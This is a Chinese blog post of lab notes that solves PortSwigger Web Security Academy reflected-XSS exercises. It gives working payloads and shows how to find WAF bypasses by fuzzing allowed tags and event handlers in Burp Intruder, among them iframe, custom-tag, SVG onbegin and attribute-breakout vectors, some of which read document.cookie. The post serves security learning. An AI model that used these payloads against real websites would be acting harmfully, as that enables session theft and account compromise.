(二)XSS实例

最新推荐文章于 2024-03-18 03:21:06 发布
最新推荐文章于 2024-03-18 03:21:06 发布
阅读量980 收藏
点赞数
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43047908/article/details/115579028
版权

Reflected XSS

Reflected XSS into HTML context with nothing encoded

构造攻击脚本:<script>alert(1)</script>
将该脚本输入到搜索框中
在这里插入图片描述

Reflected XSS into HTML context with most tags and attributes blocked

在搜索功能中包含反射型跨站点脚本漏洞,但是使用了Web应用程序防火墙(WAF)来防御常见的XSS向量。

构造payload:<img src=1 onerror=alert(document.cookie)>
输入到搜索框,返回"Tag is not allowed",此payload被阻塞了。
接下来我们将测试哪些标签和属性被阻塞了。
将包发送到intruder模块,然后将尖括号里的内容删除:img+src%3D1+onerror%3Dalert%28document.cookie%29,在尖括号中间点击两次Add§,以创建有效负载位置则search=%3C§§%3E,则开始测试。
在这里插入图片描述
查看结果,发现除body,custom tags有效负载导致200响应之外,所有有效负载均导致HTTP 400响应。

返回positions页面,修改search=%3Cbody%20=§§1%3E,开始测试。
查看结果,发现除onresize有效负载导致200响应之外,所有有效负载均导致HTTP 400响应。
在这里插入图片描述

到此可以构造攻击payload:<iframe src="https://ac981f721e8b39ea804614cf008b00ba.web-security-academy.net/?search=%22%3E%3Cbody%20onresize=alert(document.cookie)%3E" onload=this.style.width='100px'>
在这里插入图片描述
攻击完成。

Reflected XSS into HTML context with all tags blocked except custom ones

阻止所有HTML标记(自定义标记除外
构造payload:

<script>
location = 'https://acd61f451e2b7a7b808700420060005b.web-security-academy.net/?search=%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x';
</script>

该注入将创建一个ID为的自定义标签x,其中包含一个onfocus触发该alert函数的事件处理程序。加载页面后,URL末尾的哈希将重点放在此元素上,从而导致alert有效负载被调用。

在这里插入图片描述

Reflected XSS with event handlers and href attributes blocked

包含一个反映了XSS漏洞的白名单标签,但是所有事件和锚点href属性均被阻止
因此我们会注入一个矢量,单击该矢量,即可调用该alert函数。例如:<a href="">Click me</a>

在这里插入图片描述

Reflected XSS with some SVG markup allowed

阻止了常见标签,但错过了一些SVG标签和事件
注:SVG 即 Scalable Vector Graphics,是一种用来绘制矢量图的 HTML5 标签
输入标准的xss脚本:<img src=1 onerror=alert(1)>,提示"Tag is not allowed"

在intruder中构造search=<§§>,利用标签集
在这里插入图片描述
观察到所有的有效载荷造成的HTTP响应400,除了使用的那些<svg>,<animatetransform>,<title>,和<image>标签接收到200响应。
返回position,将search修改为search=<svg><animatetransform%20§§=1>,利用事件集。

在这里插入图片描述

除onbegin有效负载导致200响应之外,所有有效负载均导致HTTP 400响应。
因此构造攻击payload:
search=%22%3E%3Csvg%3E%3Canimatetransform%20onbegin=alert(1)%3E
攻击完成。

Reflected XSS into attribute with angle brackets HTML-encoded

存在XSS漏洞,但经过了HTML编码

以转义引用的属性并注入事件处理程序:"onmouseover="alert(1),将鼠标移到注入的元素上时,它将触发警报。
在这里插入图片描述

Reflected XSS in canonical link tag

将用户输入反映在规范的链接标签中,并转义了尖括号。/post?postId=1

要解决此问题,攻击将注入调用该alert函数的属性。
构造payload:https://your/?%27accesskey=%27x%27onclick=%27alert(1)
这会将X密钥设置为整个页面的访问密钥。当用户按下访问键时,将alert调用该功能。

Reflected XSS into a JavaScript string with single quote and backslash escaped

攻击发生在带有单引号和反斜杠转义的JavaScript字符串内。
要求会突破JavaScript字符串并调用该alert函数。
因此我们可以构造payload:search=</script><script>alert(1)</script>
采用重写绕过js编码检测。

在这里插入图片描述

她总是阴雨天
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS跨站脚本攻击过程最简单演示
smstong的成长轨迹
02-06 8万+
实例演示XSS的攻击全过程。
XSS跨站脚本攻击
weixin_30505225的博客
04-26 1002
1、简介 跨站脚本(cross site script)为了避免与样式css混淆,所以简称为XSSXSS是一种经常出现在web应用中的计算机安全漏洞,也是web中最主流的攻击方式。那么什么是XSS呢? XSS是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点,进而添加一些代码,嵌入到web页面中去。使别的用户访问都会执行相应的嵌入代码。 从而盗取用户资料、利用用户身...
XSS(跨站脚本攻击)原理详解(内含攻击实例
qq_52642385的博客
07-05 6747
军锋真人cs野战123平台、xss平台(推荐自行搭建xss平台,不让别人白嫖咱自个的成果,蓝莲花战队的那个就挺好)、webshell箱子、postman、beef(kali上可能要自行下载,三行命令即可)、burpsuite、xsstrike【内含软件使用方法】原理:前端提交的一些参数转换为js代码,可以回显一些东西跨站:例如你将一段攻击代码通过留言存储到对方服务器上时,对方管理员在浏览时就可能会执行你所写的攻击语句。产生层面:前端函数类:一般应用js里面的一些输出类函数但是会受浏览器内核影响,一些浏览器会
转跨站脚本攻击详解
weixin_30700977的博客
02-18 688
1 前言 近年来,随着Web2.0的大潮,越来越多的人开始关注Web安全,新的Web攻击手法层出不穷,Web应用程序面临的安全形势日益严峻。 跨站脚本攻击(XSS)就是常见的Web攻击技术之一,由于跨站脚本漏洞易于出现且利用成本低,所以被OWASP开放式Web应用程序安全项目(OWASP,Open Web Application Security Project)列为当前的头号Web安...
web安全之XSS实例解析,看看这篇文章吧
最新发布
m0_57541068的博客
03-18 994
在实际的开发过程中,我们会碰到这样的场景,在页面A中点击某个操作,这个按钮操作是需要登录权限的,所以需要跳转到登录页面,登录完成之后再跳转会A页面,我们是这么处理的,跳转登录页面的时候,会加一个参数 returnUrl,表示登录完成之后需要跳转到哪个页面,即这个地址是这样的。比较常见的一个场景就是,攻击者在社区或论坛写下一篇包含恶意 JavaScript代码的博客文章或评论,文章或评论发表后,所有访问该博客文章或评论的用户,都会在他们的浏览器中执行这段恶意的JavaScript代码。
防御XSS的七条原则
收集盒 Book box
09-06 995
前言 author: shineforyou 本文将会着重介绍防御XSS攻击的一些原则,需要读者对于XSS有所了解,至少知道XSS漏洞的基本原理,如果您对此不是特别清楚,请参考这两篇文章:《Stored and Reflected XSS Attack》《DOM Based XSS》 攻击者可以利用XSS漏洞向用户发送攻击脚本,而用户的浏览器因为没有办法知道这段脚本是不可信的,所以依
10个XSS攻击实例
m0_49521873的博客
05-25 1794
1. Cookie盗窃攻击:攻击者可以通过注入恶意代码,获取用户的 Cookie,并利用 Cookie 进行身份验证,获取用户的敏感信息。4. 注入点击劫持攻击:攻击者可以注入一段代码,将隐藏的按钮伪装成用户需要点击的区域,当用户点击时,实际上在执行一个恶意操作。9. 恶意相片攻击:攻击者可以在从社交媒体网站下载的相片中注入一段代码,当用户查看相片时,代码就会临时运行,窃取用户的信息。8. 恶意广告攻击:攻击者可以在广告中注入一段代码,当用户点击广告时,代码就可以窃取用户的个人信息。
XSS类型概述及示范用例
NZXHJ的博客
07-24 765
XSS类型概述及不同情况下示范用例
能够发现90%以上XSS漏洞的7个主要的XSS案例。
weixin_42976700的博客
11-04 1710
在阅读有关XSS的材料时,我们通常会看到经典的<script> alert(1)</ script>作为这种漏洞的证明(PoC –概念证明)。尽管确实如此,但它并没有超出此范围,这使得该领域的新手可以寻求更多解决方案来应对现实情况。 因此,这是每个人都应该知道能够利用那里的绝大多数XSS缺陷的7种情况。建立了一个网页来显示它们的变化(单引号或双引号)来进行训练(单击以转到它): 在源代码的开头,有一个HTML注释,其中包含用于触发每种情况的所有参数。它们都适...
XSS攻击实例分析
mdp1234的博客
07-29 4109
例1、简单XSS攻击 留言类,简单注入javascript 万能测试XSS漏洞代码:"/></textarea><script>alert(1)</script> 有个表单域:<input type=“text” name=“content” value=“这里是用户填写的数据”> 1、假若用户填写数据为:<script>alert('foolish!')</script>(或者<script type=..
XSS攻击实例1
01-11
简单让你了解xss攻击。 项目基于Asp.net 框架,VS2010下创建,C#语言
Web安全测试之XSS实例讲解
01-19
Web安全测试之XSS XSS 全称(Cross Site Scripting) 跨站脚本攻击, 是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者...
第04篇:XSS三重URL编码绕过实例1
08-03
0x01 漏洞实例某次测试中,遇到一个很奇葩的XSS,我们先来加一个双引号,看看输出:如图,可以看到,双引号被转义了,这时候是不是有种想放弃的想法,抱着尝试的状
XSS漏洞解决方案实例
08-30
跨网站脚本(Cross-site scripting,通常简称为XSS或跨站脚本或跨站脚本攻击)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类...
跨站脚本攻击(XSS)复现与防范、上海交通大学反射型与存储型xss案例
sGanYu
10-24 7479
目录 xss漏洞介绍 XSS是什么 XSS漏洞原理 反射型XSS攻击复现 存储型XSS攻击复现 DOM型XSS攻击复现 常用的XSS测试语句 关于XSS的防御 xss漏洞介绍 跨站脚本攻击,英文全称是Cross Site Scripting,为了不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS XSS攻击,通常指的是攻击者通过“HTML注入”篡改网页,插入恶意脚本,代码注入的一种攻击手段,当其他用户浏览网页时就会受影响
【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验(上)
热门推荐
01-13 1万+
【BP靶场portswigger-客户端11-跨站点脚本XSS】20个实验-万文详细步骤
跨站脚本攻击XSS案例及其解决方案
若华‘的博客
01-03 6933
跨站脚本攻击XSS 目录 案例一:留言板的XSS攻击 利用xss窃取用户名密码 案例:输入框的XSS攻击 怎么预防 服务端可以干的事 客户端可以干的事 跨站脚本攻击(Cross Site Script为了区别于CSS简称为XSS)指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。 案例一...
XSS漏洞-03】XSS漏洞语句构造和绕过方法实例
m0_64378913的博客
05-14 4001
目录1 XSS语句构造方式1.1 第一种:利用[<>]构造HTML/JS语句1.2 第种:利用javascript:伪协议1.3 第三种:事件驱动1.4 第四种:利用CSS(层叠样式脚本)1.5 其他标签及手法2 XSS语句变形及绕过2.1 第一种:大小写混编2.2 第种:**双写绕过**。2.3 第三种:**引号的使用**2.4 第四种:使用 [/] 代替空格2.5 第五种:在一些关键字内插入回车符与Tab符2.6 第六种:编码绕过2.7 第七种:拆分跨站2.8
反射性xss攻击实例
05-25
反射型XSS攻击是指攻击者将恶意脚本注入到URL中,当受害者点击带有恶意脚本的URL时,该恶意脚本就会在受害者浏览器中执行,从而达到攻击目的。下面是一个反射型XSS攻击的实例。 假设有一个搜索功能,用户在搜索框中输入关键字,然后点击搜索按钮进行搜索。后台处理程序将搜索的关键字拼接成URL,然后返回给前端页面,并在页面中显示搜索结果。 攻击者可以通过构造恶意的搜索关键字,在搜索结果页面中注入恶意脚本。例如,攻击者在搜索框中输入以下内容: ``` <script>alert('XSS Attack!');</script> ``` 当用户点击搜索按钮,后台程序将搜索的关键字拼接成URL,返回给前端页面,并在页面中显示搜索结果。由于URL中包含恶意脚本,因此在页面中显示搜索结果时,恶意脚本就会在用户的浏览器中执行,弹出一个警告框,提示用户遭受了XSS攻击。 这就是一个简单的反射型XSS攻击的实例。攻击者可以通过构造不同的恶意脚本,来实现不同的攻击目的,如窃取用户的敏感信息、盗取用户的cookie等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值